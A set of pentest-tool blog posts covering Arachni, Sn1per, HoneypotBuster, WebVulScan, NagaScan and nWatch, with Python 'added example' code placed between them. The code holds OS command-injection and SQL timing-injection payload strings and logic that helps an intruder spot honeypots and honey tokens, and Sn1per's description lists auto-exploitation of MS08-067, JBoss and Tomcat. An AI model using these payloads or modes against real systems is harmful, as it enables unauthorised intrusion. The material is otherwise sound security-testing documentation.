- WAF (Web Application Firewall) Detector (waf_detector) — Establishes a baseline of normal behavior and uses rDiff analysis to determine if malicious inputs cause any behavioral changes.
- BeepNotify (beep_notify) — Beeps when the scan finishes.
- EmailNotify (email_notify) — Sends a notification (and optionally a report) over SMTP at the end of the scan.
- VectorFeed (vector_feed) — Reads in vector data from which it creates elements to be audited. Can be used to perform extremely specialized/narrow audits on a per vector/element basis. Useful for unit-testing or a gazillion other things.
- Script (script) — Loads and runs an external Ruby script under the scope of a plugin, used for debugging and general hackery.
- Uncommon headers (uncommon_headers) — Logs uncommon headers.
- Content-types (content_types) — Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files.
- Vector collector (vector_collector) — Collects information about all seen input vectors which are within the scan scope.
- Headers collector (headers_collector) — Collects response headers based on specified criteria.
- Exec (exec) — Calls external executables at different scan stages.
- Metrics (metrics) — Captures metrics about multiple aspects of the scan and the web application.
- Restrict to DOM state (restrict_to_dom_state) — Restricts the audit to a single page’s DOM state, based on a URL fragment.
- Webhook notify (webhook_notify) — Sends a webhook payload over HTTP at the end of the scan.
- Rate limiter (rate_limiter) — Rate limits HTTP requests.
- Page dump (page_dump) — Dumps page data to disk as YAML.

Defaults
Default plugins will run for every scan and are placed under /plugins/defaults/.
- AutoThrottle (autothrottle) — Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
- Healthmap (healthmap) — Generates a sitemap showing the health of each crawled/audited URL.

Meta
Plugins under /plugins/defaults/meta/ perform analysis on the scan results to determine trustworthiness or just add context information or general insights.
- TimingAttacks (timing_attacks) — Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with.
It also points out the danger of DoS attacks against pages that perform heavy-duty processing.Discovery (discovery) — Performs anomaly detection on issues logged by discovery checks and warns of the possibility of false positives where applicable.Uniformity (uniformity) — Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.Trainer subsystemThe Trainer is what enables Arachni to learn from the scan it performs and incorporate that knowledge, on the fly, for the duration of the audit.Checks have the ability to individually force the Framework to learn from the HTTP responses they are going to induce.However, this is usually not required since Arachni is aware of which requests are more likely to uncover new elements or attack vectors and will adapt itself accordingly.Still, this can be an invaluable asset to Fuzzer checks.InstallationUsageRunning the specsYou can run rake spec to run all specs or you can run them selectively using the following:rake spec:core # for the core librariesrake spec:checks # for the checksrake spec:plugins # for the pluginsrake spec:reports # for the reportsrake spec:path_extractors # for the path extractorsPlease be warned, the core specs will require a beast of a machine due to the necessity to test the Grid/multi-Instance features of the system.Note: The check specs will take many hours to complete due to the timing-attack tests.Download Arachni
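The fingerprint-then-narrow behaviour described under "Platform fingerprinters" above, as an added example. This is not Arachni's code (Arachni is written in Ruby); the signature tables, the payload strings and the names fingerprint, select_payloads and plan_audit are constructed for illustration. It goes a little beyond the text in that it also handles the two options the text mentions: a user-supplied extra platform (the DB server) and switching fingerprinting off, both of which fall back to the full payload set.

```python
"""
Added example, not Arachni's own code: fingerprint a target from response
headers and Set-Cookie names, then select only the applicable payloads,
falling back to the full payload set for any dimension that could not be
identified (Arachni's "err on the side of caution" rule).
"""
from dataclasses import dataclass, field

# Constructed, illustrative payload catalogues keyed by platform tag.
OS_CMD_PAYLOADS = {
    "unix":    ["; id", "| id", "`id`"],
    "windows": ["& whoami", "| whoami"],
}
SQLI_TIMING_PAYLOADS = {
    "mysql": ["' AND SLEEP(5)-- ", "\" AND SLEEP(5)-- "],
    "pgsql": ["'; SELECT pg_sleep(5)-- "],
    "mssql": ["'; WAITFOR DELAY '0:0:5'-- "],
}

# Signature tables (constructed): a substring of the Server header, or a
# cookie-name prefix, mapped to the platform it reveals. Only IIS implies an
# OS; Apache, Nginx, Jetty and Gunicorn run on several, so no OS is claimed.
SERVER_SIGNATURES = {
    "microsoft-iis": ("iis", "windows"),
    "apache-coyote": ("tomcat", None),   # contains "apache" too; both tags are kept
    "apache": ("apache", None),
    "nginx": ("nginx", None),
    "jetty": ("jetty", None),
    "gunicorn": ("gunicorn", None),
}
POWERED_BY_SIGNATURES = {"php": "php", "asp.net": "aspx", "servlet": "java"}
COOKIE_SIGNATURES = {
    "phpsessid": "php",
    "jsessionid": "java",
    "asp.net_sessionid": "aspx",
    "aspsessionid": "asp",
}

@dataclass
class Fingerprint:
    os: set = field(default_factory=set)
    server: set = field(default_factory=set)
    language: set = field(default_factory=set)
    db: set = field(default_factory=set)   # only ever set from a user hint here

def fingerprint(headers, set_cookies):
    """Derive platform tags from one response's headers and Set-Cookie lines."""
    fp = Fingerprint()
    lower = {k.lower(): v.lower() for k, v in headers.items()}
    server = lower.get("server", "")
    for needle, (srv, os_tag) in SERVER_SIGNATURES.items():
        if needle in server:
            fp.server.add(srv)
            if os_tag:
                fp.os.add(os_tag)
    for needle, lang in POWERED_BY_SIGNATURES.items():
        if needle in lower.get("x-powered-by", ""):
            fp.language.add(lang)
    for cookie in set_cookies:
        name = cookie.split("=", 1)[0].strip().lower()
        for needle, lang in COOKIE_SIGNATURES.items():
            if name.startswith(needle):
                fp.language.add(lang)
    # Heuristic: classic ASP and ASP.NET Web Forms are hosted on Windows.
    if fp.language & {"asp", "aspx"}:
        fp.os.add("windows")
    return fp

def select_payloads(catalogue, identified):
    """Payloads for the identified platforms only; if nothing in this
    dimension was identified, send every payload in the catalogue."""
    applicable = [tag for tag in catalogue if tag in identified]
    if not applicable:
        applicable = list(catalogue)
    return [p for tag in applicable for p in catalogue[tag]]

def plan_audit(headers, set_cookies, extra_platforms=(), fingerprinting=True):
    """Build the per-check payload lists for one target."""
    fp = fingerprint(headers, set_cookies) if fingerprinting else Fingerprint()
    for tag in extra_platforms:            # user-supplied hints, e.g. the DB server
        if tag in SQLI_TIMING_PAYLOADS:
            fp.db.add(tag)
        elif tag in OS_CMD_PAYLOADS:
            fp.os.add(tag)
    return {
        "fingerprint": fp,
        "os_cmd_injection": select_payloads(OS_CMD_PAYLOADS, fp.os),
        "sql_injection_timing": select_payloads(SQLI_TIMING_PAYLOADS, fp.db),
    }

if __name__ == "__main__":
    # Constructed response: IIS serving ASP.NET, no DB hint given.
    plan = plan_audit({"Server": "Microsoft-IIS/10.0", "X-Powered-By": "ASP.NET"},
                      ["ASP.NET_SessionId=abc; path=/; HttpOnly"])
    print(plan["fingerprint"])
    print(plan["os_cmd_injection"])        # Windows payloads only
    print(plan["sql_injection_timing"])    # every DBMS: the DB was not identified
```

Note what the fallback buys: an IIS/ASP.NET fingerprint halves the OS command injection traffic, but the SQL timing check still sends all three DBMS payloads because a web server header says nothing about the database, which is exactly the case the text's "extra platforms" hint is for.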

Link: http://feedproxy.google.com/~r/PentestTools/~3/p2YzuDr4F0s/arachni-v151-web-application-security.html

Sn1per – Automated PenTest Recon Scanner

Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.

DEMO VIDEO:

FEATURES:
- Automatically collects basic recon (ie. whois, ping, DNS, etc.)
- Automatically launches Google hacking queries against a target domain
- Automatically enumerates open ports via NMap port scanning
- Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
- Automatically checks for sub-domain hijacking
- Automatically runs targeted NMap scripts against open ports
- Automatically runs targeted Metasploit scan and exploit modules
- Automatically scans all web applications for common vulnerabilities
- Automatically brute forces ALL open services
- Automatically tests for anonymous FTP access
- Automatically runs WPScan, Arachni and Nikto for all web services
- Automatically enumerates NFS shares
- Automatically tests for anonymous LDAP access
- Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
- Automatically enumerates SNMP community strings, services and users
- Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
- Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
- Automatically tests for open X11 servers
- Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
- Performs high level enumeration of multiple hosts and subnets
- Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
- Automatically gathers screenshots of all web sites
- Creates individual workspaces to store all scan output

KALI LINUX INSTALL:
./install.sh

DOCKER INSTALL:
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/
Example usage:
$ docker pull menzo/sn1per-docker
$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:
sniper <report>
sniper <target> stealth <report>
sniper <CIDR> discover
sniper <target> port <portnum>
sniper <target> fullportonly <portnum>
sniper <target> web <report>
sniper <target> nobrute <report>
sniper <targets.txt> airstrike <report>
sniper <targets.txt> nuke <report>
sniper loot

MODES:
- REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command.
- STEALTH: Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
- DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
- PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
- FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
- WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
- NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.
- AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full path of the file which contains all hosts/IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
- NUKE: Launches a full audit of multiple hosts specified in a text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
- LOOT: Automatically organizes and displays the loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type 'sniper loot'.

Note that the default (non-stealth) modes brute force every open service and run exploit modules (MS08-067, JBoss, Tomcat, ShellShock auto-pwn); only use them against hosts you are authorised to exploit, and use stealth or nobrute where exploitation or lockouts are out of scope.

SAMPLE REPORT: https://gist.github.com/1N3/8214ec2da2c91691bcbc
Download Sn1per

Link: http://feedproxy.google.com/~r/PentestTools/~3/zeJDkt2D7ew/sn1per-automated-pentest-recon-scanner.html

HoneypotBuster – Microsoft PowerShell Module to Find HoneyPots and HoneyTokens in the Network

Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host.

CodeExecution
Execute code on a target machine using Import-Module.

Invoke-HoneypotBuster
HoneypotBuster is a tool designed to spot Honey Tokens, Honey Bread Crumbs, and Honey Pots used by common Distributed Deception vendors. This tool will help spot the following deception techniques:

1. Kerberoasting Service Accounts Honey Tokens
Just like the one described in the ADSecurity article by Sean Metcalf, this tricks attackers into scanning for Domain Users with an assigned SPN (Service Principal Name) and the {adminCount = 1} LDAP attribute flag. So when you try to request a TGS for that user, you'll be exposed as a Kerberoasting attempt. TGS definition: A ticket granting server (TGS) is a logical key distribution center (KDC) component that is used by the Kerberos protocol as a trusted third party.

2. Fake Computer Accounts Honey Pots
Creating many domain computer objects with no actual devices associated with them will result in confusion for any attacker trying to study the network. Any attempt to perform lateral movement into these fake objects will lead to exposure of the attacker.

3. Fake Credentials Manager Credentials Breadcrumbs
Many deception vendors inject fake credentials into the "Credentials Manager". These credentials will also be revealed by tools such as Mimikatz. Although they aren't real, attackers might mistake them for authentic credentials and use them.

4. Fake Domain Admins Accounts Honey Tokens
Creating several domain admins and their credentials who have never been active is bad policy. These Honey Tokens lure attackers into trying to brute-force domain admin credentials. Once someone tries to authenticate as this user, an alarm will be triggered, and the attacker will be revealed. Microsoft ATA uses this method.

5. Fake Mapped Drives Breadcrumbs
Many malicious automated scripts and worms spread via SMB shares, especially if they're mapped as a network drive. This tool will try to correlate some of the data collected before to identify any mapped drive related to a specific Honey Pot server.

6. DNS Records Manipulation HoneyPots
One of the methods deception vendors use with their fake endpoints is registering the endpoints' DNS records so that they point at the Honey Pot server. They will then be able to steer the attacker directly to their honey pot instead of actual endpoints.

Usage
To install any of these modules, drop the PowerShell scripts into a directory and type
Import-Module PathTo\scriptName.ps1
Then run the module from PowerShell.
Refer to the comment-based help in each individual script for detailed usage information.
Download HoneypotBuster
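As an added illustration of techniques 1, 2, 4, 5 and 6 above, here is the correlation logic written in Python over a constructed directory snapshot; it is not HoneypotBuster's code (which is PowerShell). Attribute names mirror Active Directory (servicePrincipalName, adminCount, lastLogon, memberOf, operatingSystem), but the USERS, COMPUTERS, DNS_A, MAPPED_DRIVES and CRED_MANAGER records, the IP addresses, the min_names threshold and the function names are all assumptions for the example.

```python
"""
Added example, not HoneypotBuster's own code: correlate AD attributes, DNS
A records and host-side artefacts (all constructed inline) to flag likely
honey tokens, fake computer objects and breadcrumbs that lead to a honeypot.
"""
from collections import defaultdict

# Constructed directory snapshot. lastLogon None = never authenticated.
USERS = [
    {"sam": "svc_sql01", "spn": ["MSSQLSvc/sql01.corp.local:1433"], "adminCount": 0,
     "lastLogon": "2024-05-01", "memberOf": []},
    {"sam": "svc_backup", "spn": ["HOST/backup.corp.local"], "adminCount": 1,
     "lastLogon": None, "memberOf": []},                        # Kerberoast lure
    {"sam": "da_legacy", "spn": [], "adminCount": 1, "lastLogon": None,
     "memberOf": ["Domain Admins"]},                            # dormant DA lure
    {"sam": "jdoe", "spn": [], "adminCount": 0, "lastLogon": "2024-05-02", "memberOf": []},
]
COMPUTERS = [
    {"name": "WS001", "os": "Windows 10 Enterprise", "lastLogon": "2024-05-02"},
    {"name": "FS-FINANCE", "os": None, "lastLogon": None},      # fake object
    {"name": "SQL-ARCHIVE", "os": None, "lastLogon": None},     # fake object
    {"name": "HR-SHARE", "os": None, "lastLogon": None},        # fake object
]
DNS_A = {  # hostname -> IPv4, constructed; three fakes share one address
    "WS001": "10.0.1.20", "FS-FINANCE": "10.0.9.9",
    "SQL-ARCHIVE": "10.0.9.9", "HR-SHARE": "10.0.9.9",
}
MAPPED_DRIVES = [("Z:", r"\\FS-FINANCE\share"), ("Y:", r"\\WS001\public")]
CRED_MANAGER = [("SQL-ARCHIVE", "corp\\svc_backup"), ("WS001", "corp\\jdoe")]

def kerberoast_honey_tokens(users):
    """SPN set, adminCount=1 and never logged on: requesting a TGS exposes us."""
    return [u["sam"] for u in users
            if u["spn"] and u["adminCount"] == 1 and u["lastLogon"] is None]

def dormant_admins(users):
    """Privileged accounts that have never authenticated: likely lures."""
    return [u["sam"] for u in users
            if "Domain Admins" in u["memberOf"] and u["lastLogon"] is None]

def fake_computers(computers):
    """Computer objects with no operatingSystem attribute and no logon history."""
    return [c["name"] for c in computers
            if c["os"] is None and c["lastLogon"] is None]

def honeypot_ips(computers, dns, min_names=2):
    """Addresses that several never-seen computer names resolve to (DNS steering)."""
    by_ip = defaultdict(set)
    for name in fake_computers(computers):
        if name in dns:
            by_ip[dns[name]].add(name)
    return {ip for ip, names in by_ip.items() if len(names) >= min_names}

def breadcrumbs(drives, creds, dns, bad_ips, users):
    """Mapped drives and stored credentials that point at a honeypot host,
    or that reference an account already flagged as a honey token."""
    tokens = set(kerberoast_honey_tokens(users)) | set(dormant_admins(users))
    hits = []
    for letter, unc in drives:
        host = unc.strip("\\").split("\\")[0]
        if dns.get(host) in bad_ips:
            hits.append(("mapped_drive", letter, host))
    for target, account in creds:
        user = account.split("\\")[-1]
        if dns.get(target) in bad_ips or user in tokens:
            hits.append(("cred_manager", target, account))
    return hits

def run(users=USERS, computers=COMPUTERS, dns=DNS_A,
        drives=MAPPED_DRIVES, creds=CRED_MANAGER):
    bad_ips = honeypot_ips(computers, dns)
    return {
        "kerberoast_tokens": kerberoast_honey_tokens(users),
        "dormant_admins": dormant_admins(users),
        "fake_computers": fake_computers(computers),
        "honeypot_ips": sorted(bad_ips),
        "breadcrumbs": breadcrumbs(drives, creds, dns, bad_ips, users),
    }

if __name__ == "__main__":
    for key, value in run().items():
        print(f"{key}: {value}")
```

Two practical points: all of this is decided from data that is read (an LDAP dump, the DNS zone, the local Credential Manager and net-use list) rather than from a TGS request or an SMB connection, which is the whole reason to check first; and every rule is a heuristic, so a legitimately dormant service account with an SPN will match too, and the output should be treated as a score to review, not a verdict.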

Link: http://feedproxy.google.com/~r/PentestTools/~3/0QHsIeHrw-s/honeypotbuster-microsoft-powershell.html

WebVulScan – Web Application Vulnerability Scanner

WebVulScan is a web application vulnerability scanner. It is a web application itself, written in PHP, and can be used to test remote or local web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated for the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.
After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.

The vulnerabilities tested by WebVulScan are:
- Reflected Cross-Site Scripting
- Stored Cross-Site Scripting
- Standard SQL Injection
- Broken Authentication using SQL Injection
- Autocomplete Enabled on Password Fields
- Potentially Insecure Direct Object References
- Directory Listing Enabled
- HTTP Banner Disclosure
- SSL Certificate not Trusted
- Unvalidated Redirects

Features:
- Crawler: Crawls a website to identify and display all URLs belonging to the website.
- Scanner: Crawls a website and scans all URLs found for vulnerabilities.
- Scan History: Allows a user to view or download PDF reports of previous scans that they performed.
- Register: Allows a user to register with the web application.
- Login: Allows a user to log in to the web application.
- Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).
- PDF Generation: Dynamically generates a detailed PDF report.
- Report Delivery: The PDF report is emailed to the user as an attachment.
Download WebVulScan

Link: http://feedproxy.google.com/~r/PentestTools/~3/NmKC38VHoXw/webvulscan-web-application.html

NagaScan – NagaScan is a distributed passive scanner for Web application.

What is NagaScan
NagaScan is a distributed passive vulnerability scanner for Web applications.

What NagaScan does
NagaScan currently supports some common Web application vulnerabilities, e.g. XSS, SQL Injection, File Inclusion etc.

How NagaScan works
Configure a proxy, e.g. a Web browser proxy or a mobile Wi-Fi proxy; the traffic (including request headers, cookies, post data, URLs, etc.) will be mirrored and parsed into the central database, then the work will be automatically assigned to distributed scanners which scan for the common web application vulnerabilities.

Requirements
Web Console
sudo pip install mysql-connector
sudo pip install jinja2
sudo pip install bleach
Scanner
sudo apt-get install python-pip python-dev libmysqlclient-dev
sudo pip install requests
sudo pip install MySQL-python
sudo pip install -U selenium
sudo apt-get install libfontconfig
Proxy
sudo apt-get install python-pip python-dev libmysqlclient-dev
sudo pip install MySQL-python

Installation & Configuration
Database
Install MySQL and create a db user and password, e.g. root/toor
Create the database for NagaScan by using the command source schema.sql
Web Console
Modify www/config_override.py with your own DB configuration for the Web console:
configs = {
    'db': {
        'host': '127.0.0.1',
        'user': 'root',
        'password': 'toor'
    }
}
Run sudo python www/wsgiapp.py to start the Web console
Scanner
Modify scanner/lib/db_operation.py with your own DB configuration for the Scanner:
def db_conn():
    try:
        user = "root"
        pwd = "toor"
        hostname = "127.0.0.1"
Install PhantomJS
Linux 64-bit:
wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2
tar -jxvf phantomjs-2.1.1-linux-x86_64.tar.bz2
Linux 32-bit:
wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-i686.tar.bz2
tar -jxvf phantomjs-2.1.1-linux-i686.tar.bz2
Modify scanner/lib/hack_requests.py in line 28 as below:
self.executable_path = '[Your Own Phantomjs Binary Path]'  # e.g. /home/ubuntu/phantomjs-2.1.1-linux-x86_64/bin/phantomjs
Run the commands below to start the Scanner:
python scanner/scan_fi.py to scan for File Inclusion
python scanner/scan_xss.py to scan for XSS
python scanner/scan_sqli.py to scan for SQL injection
Proxy & Parser
Install mitmproxy
Ubuntu 16.04 (Preferred):
sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
sudo pip3 install mitmproxy
Ubuntu 14.04:
sudo apt-get install python-pip python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
sudo pip install "mitmproxy==0.18.2"
MacOS:
brew install python3
brew install mitmproxy
Run mitmdump -p 443 -s "proxy/proxy_mitmproxy.py /tmp/logs.txt" to start the Proxy
Modify parser/lib/db_operation.py with your own DB configuration for the Parser:
def db_conn():
    try:
        user = "root"
        pwd = "toor"
        hostname = "127.0.0.1"
Run python parser/parser_mitmproxy.py /tmp/logs.txt to start the Parser

Usage
Access the Web Console with the default username and password (nagascan@example.com/Naga5c@n) to configure exclusions and add a SQLMAP server. Change these defaults (and the example root/toor database credentials) before the console is reachable by anyone else: the proxy log and the database hold every captured cookie and POST body.
Install the mitmproxy certificates in your Browser or Mobile device per the mitmproxy instructions
Add the proxy you created to your Web Browser or Mobile Wi-Fi settings
Just browse websites from the Browser or use apps on Mobile, whatever you like
Have fun!
Download NagaScan
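An added example of the capture-then-parse step described under "How NagaScan works": turning requests recorded by an intercepting proxy into deduplicated input vectors that distributed scanners can pick up. This is not NagaScan's proxy script, parser or schema; the one-JSON-object-per-line log format, the CAPTURED records, the exclusion rules and the names extract_vectors and build_queue are constructed for the example. It goes slightly beyond the text in also handling JSON request bodies and the scope exclusions the Usage section refers to.

```python
"""
Added example, not NagaScan's own code: parse captured proxy traffic into
unique, scannable input vectors (query, cookie, form body, JSON body), with
host and static-file exclusions so third-party traffic is never scanned.
"""
import json
from urllib.parse import urlsplit, parse_qsl

# Constructed captured traffic, as a proxy addon might log it (one JSON per line).
CAPTURED = """
{"method": "GET", "url": "https://shop.example.test/search?q=shoes&page=1", "headers": {"Cookie": "sid=abc123; lang=en"}, "body": ""}
{"method": "GET", "url": "https://shop.example.test/search?q=boots&page=2", "headers": {"Cookie": "sid=abc123; lang=en"}, "body": ""}
{"method": "POST", "url": "https://shop.example.test/login", "headers": {"Content-Type": "application/x-www-form-urlencoded", "Cookie": "sid=abc123"}, "body": "user=alice&pass=secret"}
{"method": "POST", "url": "https://shop.example.test/api/cart", "headers": {"Content-Type": "application/json"}, "body": "{\\"item\\": 42, \\"qty\\": 1}"}
{"method": "GET", "url": "https://cdn.example.test/static/app.js", "headers": {}, "body": ""}
{"method": "GET", "url": "https://mail.google.com/mail/u/0/", "headers": {}, "body": ""}
"""

# Exclusions (constructed): hosts we have no authorisation to test, and
# static assets that carry no server-side input.
EXCLUDED_HOST_SUFFIXES = (".google.com",)
STATIC_EXTENSIONS = (".js", ".css", ".png", ".jpg", ".woff2")

def parse_cookies(header):
    """Split a Cookie header into (name, value) pairs, ignoring empty names."""
    pairs = (c.partition("=") for c in header.split(";"))
    return [(k.strip(), v) for k, _, v in pairs if k.strip()]

def extract_vectors(record):
    """Return (location, name, value) triples for every user-controlled input."""
    parts = urlsplit(record["url"])
    vectors = [("query", k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    headers = {k.lower(): v for k, v in record.get("headers", {}).items()}
    if "cookie" in headers:
        vectors += [("cookie", k, v) for k, v in parse_cookies(headers["cookie"])]
    body, ctype = record.get("body", ""), headers.get("content-type", "")
    if body and "json" in ctype:
        try:
            data = json.loads(body)
        except ValueError:          # malformed body: nothing to inject into
            data = {}
        if isinstance(data, dict):
            vectors += [("json", k, str(v)) for k, v in data.items()]
    elif body:
        vectors += [("body", k, v) for k, v in parse_qsl(body, keep_blank_values=True)]
    return vectors

def in_scope(record):
    """Drop excluded hosts and static assets before they reach the queue."""
    parts = urlsplit(record["url"])
    if parts.hostname is None or parts.hostname.endswith(EXCLUDED_HOST_SUFFIXES):
        return False
    return not parts.path.lower().endswith(STATIC_EXTENSIONS)

def build_queue(log_text):
    """Deduplicate by method, host, path and the set of input names, keeping
    the first-seen values as the template a scanner will mutate."""
    queue = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        if not in_scope(record):
            continue
        vectors = extract_vectors(record)
        if not vectors:
            continue
        parts = urlsplit(record["url"])
        key = (record["method"], parts.hostname, parts.path,
               tuple(sorted((loc, name) for loc, name, _ in vectors)))
        queue.setdefault(key, {"method": record["method"],
                               "url": f"{parts.scheme}://{parts.netloc}{parts.path}",
                               "vectors": vectors})
    return list(queue.values())

if __name__ == "__main__":
    for entry in build_queue(CAPTURED):
        print(entry["method"], entry["url"], [(loc, n) for loc, n, _ in entry["vectors"]])
```

The dedup key ignores parameter values on purpose, so the two searches collapse into one work item while the login form and the JSON cart endpoint stay separate; the exclusion list matters because a browser or phone behind the proxy will send traffic for every site it touches, including logged-in third-party sessions that must not be scanned.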

Link: http://feedproxy.google.com/~r/PentestTools/~3/OIaIaPvYeq4/nagascan-nagascan-is-distributed.html

nWatch – Tool for Host Discovery, PortScanning and Operating System Fingerprinting

nWatch is a handy tool for host discovery, portscanning and operating system fingerprinting.

Demo video

Requirements
- nmap
- scapy
- colorama
- ctypes

Installation and execution
Install the requirements, then download nWatch by cloning the Git repository:
git clone https://github.com/suraj-root/nWatch.git
cd nWatch/
python nwatch.py
For educational purposes only.
Download nWatch

Link: http://feedproxy.google.com/~r/PentestTools/~3/t0y3uiyNccU/nwatch-tool-for-host-discovery.html